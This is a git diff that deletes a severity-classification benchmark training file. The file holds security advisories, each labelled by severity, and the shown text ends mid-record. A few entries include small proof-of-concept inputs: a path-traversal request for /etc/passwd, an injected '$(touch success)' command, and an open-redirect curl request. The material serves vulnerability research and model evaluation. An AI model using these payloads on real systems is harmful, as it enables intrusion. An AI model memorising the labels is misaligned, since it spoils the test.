diff --git "a/benchmark/task3_severity/train.jsonl" "b/benchmark/task3_severity/train.jsonl" deleted file mode 100644--- "a/benchmark/task3_severity/train.jsonl" +++ /dev/null @@ -1,6797 +0,0 @@ -{"id": "bfe292fe63453a07248f", "text": "YetiForceCRM is vulnerable to Business Logic Errors because product amount can be a negative number\n\nYetiForceCRM is vulnerable to Business Logic Errors because product amount can be a negative number.", "text_raw": "YetiForceCRM is vulnerable to Business Logic Errors because product amount can be a negative number\n\n[Severity: HIGH]\n\nYetiForceCRM is vulnerable to Business Logic Errors because product amount can be a negative number.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-16", "split": "train"} -{"id": "3db49de9c98524a6bcb2", "text": "XSS in richtext custom tag attributes in ezsystems/ezplatform-richtext\n\nThe rich text editor does not escape attribute data when previewing custom tags. This means XSS is possible if custom tags are used, for users who have access to editing rich text content. Frontend content view is not affected, but the vulnerability could be used by editors to attack other editors. The fix ensures custom tag attribute data is escaped in the editor.", "text_raw": "XSS in richtext custom tag attributes in ezsystems/ezplatform-richtext\n\n[Severity: MEDIUM]\n\nThe rich text editor does not escape attribute data when previewing custom tags. This means XSS is possible if custom tags are used, for users who have access to editing rich text content. Frontend content view is not affected, but the vulnerability could be used by editors to attack other editors. The fix ensures custom tag attribute data is escaped in the editor.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-01", "split": "train"} -{"id": "7433571f553bb90e9381", "text": "Open Redirect in st\n\nst is a module for serving static files.\n\nAn attacker is able to craft a request that results in an `HTTP 301` (redirect) to an entirely different domain.\n\nA request for: `http://some.server.com//nodesecurity.org/%2e%2e` would result in a 301 to `//nodesecurity.org/%2e%2e` which most browsers treat as a proper redirect as `//` is translated into the current schema being used.\n\n**Mitigating factor:**\n\nIn order for this to work, `st` must be serving from the root of a server (`/`) rather than the typical sub directory (`/static/`) and the redirect URL will end with some form of URL encoded `..` (\"%2e%2e\", \"%2e.\", \".%2e\").\n\nCode example (provided by Xin Gao):\n\n[example.js]\n\n```js\nvar st = require('st') \nvar http = require('http') \nhttp.createServer(st(process.cwd())).listen(1337)\n```\n\n```shell\n$ curl -v http://localhost:1337//cve.mitre.com/%2e%2e\n* Trying ::1...\n* TCP_NODELAY set\n* Connected to localhost (::1) port 1337 (#0)\n> GET //cve.mitre.com/%2e%2e HTTP/1.1\n> Host: localhost:1337\n> User-Agent: curl/7.54.0\n> Accept: */*\n>\n< HTTP/1.1 301 Moved Permanently\n< cache-control: public, max-age=600\n< last-modified: Fri, 13 Oct 2017 22:56:33 GMT\n< etag: \"16777220-46488904-1507935393000\"\n< location: //cve.mitre.com/%2e%2e/\n< Date: Fri, 13 Oct 2017 22:56:41 GMT\n< Connection: keep-alive\n< Content-Length: 30\n<\n* Connection #0 to host localhost left intact\n```\n\n## Recommendation\n\nUpdate to version 1.2.2 or later.", "text_raw": "Open Redirect in st\n\n[Severity: MEDIUM]\n\nst is a module for serving static files.\n\nAn attacker is able to craft a request that results in an `HTTP 301` (redirect) to an entirely different domain. \n\nA request for: `http://some.server.com//nodesecurity.org/%2e%2e` would result in a 301 to `//nodesecurity.org/%2e%2e` which most browsers treat as a proper redirect as `//` is translated into the current schema being used.\n\n**Mitigating factor:** \n\nIn order for this to work, `st` must be serving from the root of a server (`/`) rather than the typical sub directory (`/static/`) and the redirect URL will end with some form of URL encoded `..` (\"%2e%2e\", \"%2e.\", \".%2e\"). \n\nCode example (provided by Xin Gao): \n\n[example.js]\n\n```js\nvar st = require('st') \nvar http = require('http') \nhttp.createServer(st(process.cwd())).listen(1337)\n```\n\n```shell\n$ curl -v http://localhost:1337//cve.mitre.com/%2e%2e\n* Trying ::1...\n* TCP_NODELAY set\n* Connected to localhost (::1) port 1337 (#0)\n> GET //cve.mitre.com/%2e%2e HTTP/1.1\n> Host: localhost:1337\n> User-Agent: curl/7.54.0\n> Accept: */*\n>\n< HTTP/1.1 301 Moved Permanently\n< cache-control: public, max-age=600\n< last-modified: Fri, 13 Oct 2017 22:56:33 GMT\n< etag: \"16777220-46488904-1507935393000\"\n< location: //cve.mitre.com/%2e%2e/\n< Date: Fri, 13 Oct 2017 22:56:41 GMT\n< Connection: keep-alive\n< Content-Length: 30\n<\n* Connection #0 to host localhost left intact\n```\n\n\n## Recommendation\n\nUpdate to version 1.2.2 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-08-06", "split": "train"} -{"id": "4b4b72c88b539d43ad11", "text": "ansi_up cross-site scripting vulnerability\n\nThe npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.", "text_raw": "ansi_up cross-site scripting vulnerability\n\n[Severity: MEDIUM]\n\nThe npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-03-11", "split": "train"} -{"id": "98ea39f422e28effc993", "text": "XXE vulnerability in Jenkins Selenium HTML report Plugin\n\nJenkins Selenium HTML report Plugin 1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.\n\nThis allows attackers with the ability to control the report files parsed using this plugin to have Jenkins parse a crafted report file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.\n\nJenkins Selenium HTML report Plugin 1.1 disables external entity resolution for its XML parser.", "text_raw": "XXE vulnerability in Jenkins Selenium HTML report Plugin\n\n[Severity: MEDIUM]\n\nJenkins Selenium HTML report Plugin 1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.\n\nThis allows attackers with the ability to control the report files parsed using this plugin to have Jenkins parse a crafted report file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.\n\nJenkins Selenium HTML report Plugin 1.1 disables external entity resolution for its XML parser.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-07-02", "split": "train"} -{"id": "7acea90a0fde444ef1ab", "text": "Withdrawn, accidental duplicate publish.\n\nDirectory traversal vulnerability in actionpack/lib/action_dispatch/middleware/static.rb in Action Pack in Ruby on Rails 3.x before 3.2.21, 4.0.x before 4.0.12, 4.1.x before 4.1.8, and 4.2.x before 4.2.0.beta4, when serve_static_assets is enabled, allows remote attackers to determine the existence of files outside the application root via vectors involving a \\ (backslash) character, a similar issue to CVE-2014-7818.", "text_raw": "Moderate severity vulnerability that affects actionpack\n\n[Severity: MEDIUM]\n\nWithdrawn, accidental duplicate publish.\r\n\r\nDirectory traversal vulnerability in actionpack/lib/action_dispatch/middleware/static.rb in Action Pack in Ruby on Rails 3.x before 3.2.21, 4.0.x before 4.0.12, 4.1.x before 4.1.8, and 4.2.x before 4.2.0.beta4, when serve_static_assets is enabled, allows remote attackers to determine the existence of files outside the application root via vectors involving a \\ (backslash) character, a similar issue to CVE-2014-7818.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-09-17", "split": "train"} -{"id": "ed5fef7987f805e8f034", "text": "Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to bypass Enhanced Security Usage taggings when they present a certificate that is invalid for a specific use, aka \".NET Security Feature Bypass Vulnerability.\"", "text_raw": "Moderate severity vulnerability that affects Microsoft.AspNetCore.Mvc and Microsoft.AspNetCore.Mvc.Core\n\n[Severity: MEDIUM]\n\nMicrosoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to bypass Enhanced Security Usage taggings when they present a certificate that is invalid for a specific use, aka \".NET Security Feature Bypass Vulnerability.\"", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-16", "split": "train"} -{"id": "f6ad6d7aab91760f91ae", "text": "Directory Traversal in commentapp.stetsonwood\n\nAffected versions of `commentapp.stetsonwood` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in commentapp.stetsonwood\n\n[Severity: HIGH]\n\nAffected versions of `commentapp.stetsonwood` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-23", "split": "train"} -{"id": "bc725f983b6856b14472", "text": "Cross-site scripting (XSS) from writer field content in the site frontend\n\n### Impact\n\nKirby's [writer field](https://getkirby.com/docs/reference/panel/fields/writer) stores its formatted content as HTML code. Unlike with other field types, it is not possible to [escape HTML special characters](https://getkirby.com/docs/guide/templates/escaping) against cross-site scripting (XSS) attacks, otherwise the formatting would be lost.\n\nCross-site scripting (XSS) is a type of vulnerability that allows to execute any kind of JavaScript code inside the site frontend or Panel session of other users. If the user is logged in to the Panel, a harmful script can for example trigger requests to Kirby's API with the permissions of the victim.\n\nBecause the writer field did not securely sanitize its contents on save, it was possible to inject malicious HTML code into the content file by sending it to Kirby's API directly without using the Panel. This malicious HTML code would then be displayed on the site frontend and executed in the browsers of site visitors and logged in users who are browsing the site.\n\nThis vulnerability is critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible.\n\nYou are *not* affected if you don't use the writer field in any of your blueprints. The attack can only be performed by logged-in users and only surfaces in the site frontend (i.e. in your templates). The Panel itself is unaffected and will not execute JavaScript that was injected into writer field content.\n\n### Patches\n\nWe have patched the vulnerability in [Kirby 3.5.8](https://github.com/getkirby/kirby/releases/tag/3.5.8) by sanitizing all writer field contents on the backend whenever the content is modified via Kirby's API. Please update to this or a [later version](https://github.com/getkirby/kirby/releases/) to fix the vulnerability.\n\n### Credits\n\nThanks to Azrul Ikhwan Zulkifli (@azrultech) from BAE Systems AI Vulnerability Research Team for responsibly reporting the identified issue.", "text_raw": "Cross-site scripting (XSS) from writer field content in the site frontend\n\n[Severity: MEDIUM]\n\n### Impact\n\nKirby's [writer field](https://getkirby.com/docs/reference/panel/fields/writer) stores its formatted content as HTML code. Unlike with other field types, it is not possible to [escape HTML special characters](https://getkirby.com/docs/guide/templates/escaping) against cross-site scripting (XSS) attacks, otherwise the formatting would be lost.\n\nCross-site scripting (XSS) is a type of vulnerability that allows to execute any kind of JavaScript code inside the site frontend or Panel session of other users. If the user is logged in to the Panel, a harmful script can for example trigger requests to Kirby's API with the permissions of the victim.\n\nBecause the writer field did not securely sanitize its contents on save, it was possible to inject malicious HTML code into the content file by sending it to Kirby's API directly without using the Panel. This malicious HTML code would then be displayed on the site frontend and executed in the browsers of site visitors and logged in users who are browsing the site.\n\nThis vulnerability is critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible.\n\nYou are *not* affected if you don't use the writer field in any of your blueprints. The attack can only be performed by logged-in users and only surfaces in the site frontend (i.e. in your templates). The Panel itself is unaffected and will not execute JavaScript that was injected into writer field content.\n\n### Patches\n\nWe have patched the vulnerability in [Kirby 3.5.8](https://github.com/getkirby/kirby/releases/tag/3.5.8) by sanitizing all writer field contents on the backend whenever the content is modified via Kirby's API. Please update to this or a [later version](https://github.com/getkirby/kirby/releases/) to fix the vulnerability.\n\n### Credits\n\nThanks to Azrul Ikhwan Zulkifli (@azrultech) from BAE Systems AI Vulnerability Research Team for responsibly reporting the identified issue.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-16", "split": "train"} -{"id": "c535250a5617efb0dee9", "text": "Buffer Overflow in pycrypto\n\nHeap-based buffer overflow in the ALGnew function in block_templace.c in Python Cryptography Toolkit (aka pycrypto) allows remote attackers to execute arbitrary code as demonstrated by a crafted iv parameter to cryptmsg.py.", "text_raw": "Buffer Overflow in pycrypto\n\n[Severity: CRITICAL]\n\nHeap-based buffer overflow in the ALGnew function in block_templace.c in Python Cryptography Toolkit (aka pycrypto) allows remote attackers to execute arbitrary code as demonstrated by a crafted iv parameter to cryptmsg.py.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-12-14", "split": "train"} -{"id": "d2ec1658ee01344d71ce", "text": "SQL Injection in Kylin\n\nKylin has some restful apis which will concatenate SQLs with the user input string, a user is likely to be able to run malicious database queries.", "text_raw": "SQL Injection in Kylin\n\n[Severity: MEDIUM]\n\nKylin has some restful apis which will concatenate SQLs with the user input string, a user is likely to be able to run malicious database queries.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-07-27", "split": "train"} -{"id": "b09510bfbc94483dba81", "text": "Zoho BugTracker Multiple Stored XSS Vulnerabilities", "text_raw": "Zoho BugTracker Multiple Stored XSS Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2012-08-06", "split": "train"} -{"id": "1e41f32f16b9f3020d65", "text": "smart_proxy_dynflow gem authentication bypass in Foreman remote execution feature\n\nAn authentication bypass flaw was found in the smart_proxy_dynflow component used by Foreman. A malicious attacker can use this flaw to remotely execute arbitrary commands on machines managed by vulnerable Foreman instances, in a highly privileged context.", "text_raw": "smart_proxy_dynflow gem authentication bypass in Foreman remote execution feature\n\n[Severity: CRITICAL]\n\nAn authentication bypass flaw was found in the smart_proxy_dynflow component used by Foreman. A malicious attacker can use this flaw to remotely execute arbitrary commands on machines managed by vulnerable Foreman instances, in a highly privileged context.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-10-08", "split": "train"} -{"id": "a215deff9a6a65fbd57d", "text": "Cross-site scripting in jspdf\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). It's possible to inject JavaScript code via the `html` method.", "text_raw": "Cross-site scripting in jspdf\n\n[Severity: MEDIUM]\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). It's possible to inject JavaScript code via the `html` method.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-17", "split": "train"} -{"id": "42d24f50f77857eb1ebc", "text": "XStream can cause a Denial of Service\n\n### Impact\nThe vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.\n\n### Patches\nXStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\n\n### Workarounds\nSee [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.\n\n### References\nSee full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39140](https://x-stream.github.io/CVE-2021-39140.html).\n\n### Credits\nThe vulnerability was discovered and reported by Lai Han of nsfocus security team.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)\n* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)", "text_raw": "XStream can cause a Denial of Service\n\n[Severity: MEDIUM]\n\n### Impact\nThe vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.\n\n### Patches\nXStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\n\n### Workarounds\nSee [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.\n\n### References\nSee full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39140](https://x-stream.github.io/CVE-2021-39140.html).\n\n### Credits\nThe vulnerability was discovered and reported by Lai Han of nsfocus security team.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)\n* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "36e1903276c16a8365bc", "text": "Use after free in image\n\nAffected versions of this crate would call Vec::set_len on an uninitialized vector with user-provided type parameter, in an interface of the HDR image format decoder. They would then also call other code that could panic before initializing all instances.\n\nThis could run Drop implementations on uninitialized types, equivalent to use-after-free, and allow an attacker arbitrary code execution.\n\nTwo different fixes were applied. It is possible to conserve the interface by ensuring proper initialization before calling Vec::set_len. Drop is no longer called in case of panic, though.\n\nStarting from version 0.22, a breaking change to the interface requires callers to pre-allocate the output buffer and pass a mutable slice instead, avoiding all unsafe code.", "text_raw": "Use after free in image\n\n[Severity: CRITICAL]\n\nAffected versions of this crate would call Vec::set_len on an uninitialized vector with user-provided type parameter, in an interface of the HDR image format decoder. They would then also call other code that could panic before initializing all instances.\n\nThis could run Drop implementations on uninitialized types, equivalent to use-after-free, and allow an attacker arbitrary code execution.\n\nTwo different fixes were applied. It is possible to conserve the interface by ensuring proper initialization before calling Vec::set_len. Drop is no longer called in case of panic, though.\n\nStarting from version 0.22, a breaking change to the interface requires callers to pre-allocate the output buffer and pass a mutable slice instead, avoiding all unsafe code.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "4f69bbce5dcf33b6c719", "text": "Improper Authentication\n\n### Impact\nA maliciously crafted claim may be incorrectly authenticated by the bot. Impacts bots that are not configured to be used as a Skill. This vulnerability requires an an attacker to have internal knowledge of the bot.\n\n### Patches\nThe problem has been patched in all affected versions. Please see the list of patched versions for the most appropriate one for your individual case.\n\n### Workarounds\nUsers who do not wish or are not able to upgrade can add an authentication configuration containing ClaimsValidator which throws an exception if the Claims are Skill Claims.\n\nFor detailed instructions, see the link in the References section.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Microsoft Bot Builder SDK](https://github.com/microsoft/botbuilder-dotnet)\n* Email us at [bf-reports@microsoft.com](mailto:bf-reports@microsoft.com)", "text_raw": "Improper Authentication\n\n[Severity: HIGH]\n\n### Impact\nA maliciously crafted claim may be incorrectly authenticated by the bot. Impacts bots that are not configured to be used as a Skill. This vulnerability requires an an attacker to have internal knowledge of the bot.\n\n### Patches\nThe problem has been patched in all affected versions. Please see the list of patched versions for the most appropriate one for your individual case.\n\n### Workarounds\nUsers who do not wish or are not able to upgrade can add an authentication configuration containing ClaimsValidator which throws an exception if the Claims are Skill Claims.\n\nFor detailed instructions, see the link in the References section.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Microsoft Bot Builder SDK](https://github.com/microsoft/botbuilder-dotnet)\n* Email us at [bf-reports@microsoft.com](mailto:bf-reports@microsoft.com)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-03-08", "split": "train"} -{"id": "708406dc87a71dfbb37a", "text": "lawn-login exposes database password to unauthorized users\n\nThe login function in `lib/lawn.rb` in the lawn-login gem 0.0.7 for Ruby places credentials on the curl command line, which allows local users to obtain sensitive information by listing the process.", "text_raw": "lawn-login exposes database password to unauthorized users\n\n[Severity: HIGH]\n\nThe login function in `lib/lawn.rb` in the lawn-login gem 0.0.7 for Ruby places credentials on the curl command line, which allows local users to obtain sensitive information by listing the process.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-01-22", "split": "train"} -{"id": "d61c2417ea866056d3b4", "text": "elFinder before 2.1.59 contains multiple vulnerabilities leading to RCE\n\n### Impact\n\nWe recently fixed several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with the minimal configuration.\n\n### Patches\n\nThe issues were addressed in our last release, 2.1.59.\n\n### Workarounds\n\nIf you can't update to 2.1.59, make sure your connector is not exposed without authentication.\n\n### Reference\n\nFurther technical details will be disclosed on https://blog.sonarsource.com/tag/security after some time.\n\n### For more information\n\nIf you have any questions or comments about this advisory, you can contact:\n - The original reporters, by sending an email to vulnerability.research@sonarsource.com;\n - The maintainers, by opening an issue on this repository.", "text_raw": "elFinder before 2.1.59 contains multiple vulnerabilities leading to RCE\n\n[Severity: CRITICAL]\n\n### Impact\n\nWe recently fixed several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with the minimal configuration. \n\n### Patches\n\nThe issues were addressed in our last release, 2.1.59. \n\n### Workarounds\n\nIf you can't update to 2.1.59, make sure your connector is not exposed without authentication.\n\n### Reference\n\nFurther technical details will be disclosed on https://blog.sonarsource.com/tag/security after some time.\n\n### For more information\n\nIf you have any questions or comments about this advisory, you can contact:\n - The original reporters, by sending an email to vulnerability.research@sonarsource.com;\n - The maintainers, by opening an issue on this repository.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-06-16", "split": "train"} -{"id": "4a28b227c391f6a674d4", "text": "Cross-Site Scripting in Page Preview\n\n### Problem\nFailing to properly encode _Page TSconfig_ settings, corresponding page preview module (_Web>View_) is vulnerable to persistent cross-site scripting. A valid backend user account is needed to exploit this vulnerability.\n\n### Solution\nUpdate to TYPO3 versions 9.5.28, 10.4.18, 11.3.1 that fix the problem described.\n\n### Credits\nThanks to TYPO3 core merger Oliver Bartsch who reported and fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-009](https://typo3.org/security/advisory/typo3-core-sa-2021-009)", "text_raw": "Cross-Site Scripting in Page Preview\n\n[Severity: MEDIUM]\n\n> ### Meta\n> * CVSS: `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC` (5.0)\n\n### Problem\nFailing to properly encode _Page TSconfig_ settings, corresponding page preview module (_Web>View_) is vulnerable to persistent cross-site scripting. A valid backend user account is needed to exploit this vulnerability.\n\n### Solution\nUpdate to TYPO3 versions 9.5.28, 10.4.18, 11.3.1 that fix the problem described.\n\n### Credits\nThanks to TYPO3 core merger Oliver Bartsch who reported and fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-009](https://typo3.org/security/advisory/typo3-core-sa-2021-009)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-07-22", "split": "train"} -{"id": "5017fe78e96b56230e8f", "text": "Media Player Classic 6.4.9.1 DLL Hijacking Exploit", "text_raw": "Media Player Classic 6.4.9.1 DLL Hijacking Exploit\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2010-08-26", "split": "train"} -{"id": "d789b89ed3503c0b4b7a", "text": "Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution", "text_raw": "Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution\n\nSeverity: critical", "severity": "critical", "severity_label": 3, "source": "zeroscience", "timestamp": "2017-05-03", "split": "train"} -{"id": "c049be28aefcdcd6a8e1", "text": "Double free in slice-deque\n\nAn issue was discovered in the slice-deque crate through 2021-02-19 for Rust. A double drop can occur in SliceDeque::drain_filter upon a panic in a predicate function.", "text_raw": "Double free in slice-deque\n\n[Severity: HIGH]\n\nAn issue was discovered in the slice-deque crate through 2021-02-19 for Rust. A double drop can occur in SliceDeque::drain_filter upon a panic in a predicate function.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "3b257b51d7a033ff2947", "text": "Improper Input Validation in OpenCV\n\nOpenCV 3.0.0 allows remote attackers to cause a denial of service (segfault) via vectors involving corrupt chunks. This issue was fixed in OpenCV version 3.3.1 (corresponding to OpenCV 3.3.1.11).", "text_raw": "Improper Input Validation in OpenCV\n\n[Severity: MEDIUM]\n\nOpenCV 3.0.0 allows remote attackers to cause a denial of service (segfault) via vectors involving corrupt chunks. This issue was fixed in OpenCV version 3.3.1 (corresponding to OpenCV 3.3.1.11).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "ad8d63beb2ad7bb529ff", "text": "Stored XSS vulnerability on Bounce Management Callback\n\n### Impact\nInsufficient sanitization / filtering allows for arbitrary JavaScript Injection in Mautic using the bounce management callback function. The values submitted in the \"error\" and \"error_related_to\" parameters of the POST request of the bounce management callback will be permanently stored and executed once the details page of an affected lead is opened by a Mautic user.\n\nAn attacker with access to the bounce management callback function (identified with the Mailjet webhook, but it is assumed this will work uniformly across all kinds of webhooks) can inject arbitrary JavaScript Code into the \"error\" and \"error_related_to\" parameters of the POST request (POST /mailer//callback). It is noted that there is no authentication needed to access this function.\n\nThe JavaScript Code is stored permanently in the web application and executed every time an authenticated user views the details page of a single contact / lead in Mautic. This means, arbitrary code can be executed to, e.g., steal or tamper with information.\n\n### Patches\nUpgrade to 3.3.4 or 4.0.0\n\n### Workarounds\nNo\n\n### References\nhttps://github.com/mautic/mautic/releases/tag/3.3.4\nhttps://github.com/mautic/mautic/releases/tag/4.0.0\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n* Email us at [security@mautic.org](mailto:security@mautic.org)", "text_raw": "Stored XSS vulnerability on Bounce Management Callback\n\n[Severity: HIGH]\n\n### Impact\nInsufficient sanitization / filtering allows for arbitrary JavaScript Injection in Mautic using the bounce management callback function. The values submitted in the \"error\" and \"error_related_to\" parameters of the POST request of the bounce management callback will be permanently stored and executed once the details page of an affected lead is opened by a Mautic user.\n\nAn attacker with access to the bounce management callback function (identified with the Mailjet webhook, but it is assumed this will work uniformly across all kinds of webhooks) can inject arbitrary JavaScript Code into the \"error\" and \"error_related_to\" parameters of the POST request (POST /mailer//callback). It is noted that there is no authentication needed to access this function.\n\nThe JavaScript Code is stored permanently in the web application and executed every time an authenticated user views the details page of a single contact / lead in Mautic. This means, arbitrary code can be executed to, e.g., steal or tamper with information.\n\n### Patches\nUpgrade to 3.3.4 or 4.0.0\n\n### Workarounds\nNo\n\n### References\nhttps://github.com/mautic/mautic/releases/tag/3.3.4\nhttps://github.com/mautic/mautic/releases/tag/4.0.0\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n* Email us at [security@mautic.org](mailto:security@mautic.org)\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-01", "split": "train"} -{"id": "f89f68e315752c617afc", "text": "curlrequest allows execution of arbitrary commands\n\ncurlrequest through 1.0.1 allows execution of arbitrary commands. It is possible to inject arbitrary commands by using a semicolon char in any of the `options` values.", "text_raw": "curlrequest allows execution of arbitrary commands\n\n[Severity: CRITICAL]\n\ncurlrequest through 1.0.1 allows execution of arbitrary commands. It is possible to inject arbitrary commands by using a semicolon char in any of the `options` values.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-05-13", "split": "train"} -{"id": "4b672f5c597078a7a6ad", "text": "Open Redirect in Next.js\n\nNext.js is an open source website development framework to be used with the React library. In affected versions specially encoded paths could be used when `pages/_error.js` was statically generated, allowing an open redirect to occur to an external site. In general, this redirect does not directly harm users although it can allow for phishing attacks by redirecting to an attacker's domain from a trusted domain.\n\n### Impact\n\n- **Affected:** Users of Next.js between `10.0.5` and `10.2.0`\n- **Affected:** Users of Next.js between `11.0.0` and `11.0.1` using `pages/_error.js` without `getInitialProps`\n- **Affected:** Users of Next.js between `11.0.0` and `11.0.1` using `pages/_error.js` and `next export`\n- **Not affected**: Deployments on Vercel ([vercel.com](https://vercel.com)) are not affected\n- **Not affected:** Deployments **with** `pages/404.js`\n- Note that versions prior to 0.9.9 package `next` npm package hosted a different utility (0.4.1 being the latest version of that codebase), and this advisory does not apply to those versions.\n\nWe recommend upgrading to the latest version of Next.js to improve the overall security of your application.\n\n### Patches\n\nhttps://github.com/vercel/next.js/releases/tag/v11.1.0", "text_raw": "Open Redirect in Next.js\n\n[Severity: MEDIUM]\n\nNext.js is an open source website development framework to be used with the React library. In affected versions specially encoded paths could be used when `pages/_error.js` was statically generated, allowing an open redirect to occur to an external site. In general, this redirect does not directly harm users although it can allow for phishing attacks by redirecting to an attacker's domain from a trusted domain.\n\n### Impact\n\n- **Affected:** Users of Next.js between `10.0.5` and `10.2.0`\n- **Affected:** Users of Next.js between `11.0.0` and `11.0.1` using `pages/_error.js` without `getInitialProps`\n- **Affected:** Users of Next.js between `11.0.0` and `11.0.1` using `pages/_error.js` and `next export`\n- **Not affected**: Deployments on Vercel ([vercel.com](https://vercel.com)) are not affected\n- **Not affected:** Deployments **with** `pages/404.js`\n- Note that versions prior to 0.9.9 package `next` npm package hosted a different utility (0.4.1 being the latest version of that codebase), and this advisory does not apply to those versions.\n\nWe recommend upgrading to the latest version of Next.js to improve the overall security of your application.\n\n### Patches\n\nhttps://github.com/vercel/next.js/releases/tag/v11.1.0", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-12", "split": "train"} -{"id": "3dc6c0ab87ddb28c234b", "text": "Command Injection in ps-kill\n\nThis affects all versions of package ps-kill. If (attacker-controlled) user input is given to the kill function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization in the index.js file.\n\nPoC (provided by reporter): \n```js\nvar ps_kill = require('ps-kill');\nps_kill.kill('$(touch success)', function() {});\n```", "text_raw": "Command Injection in 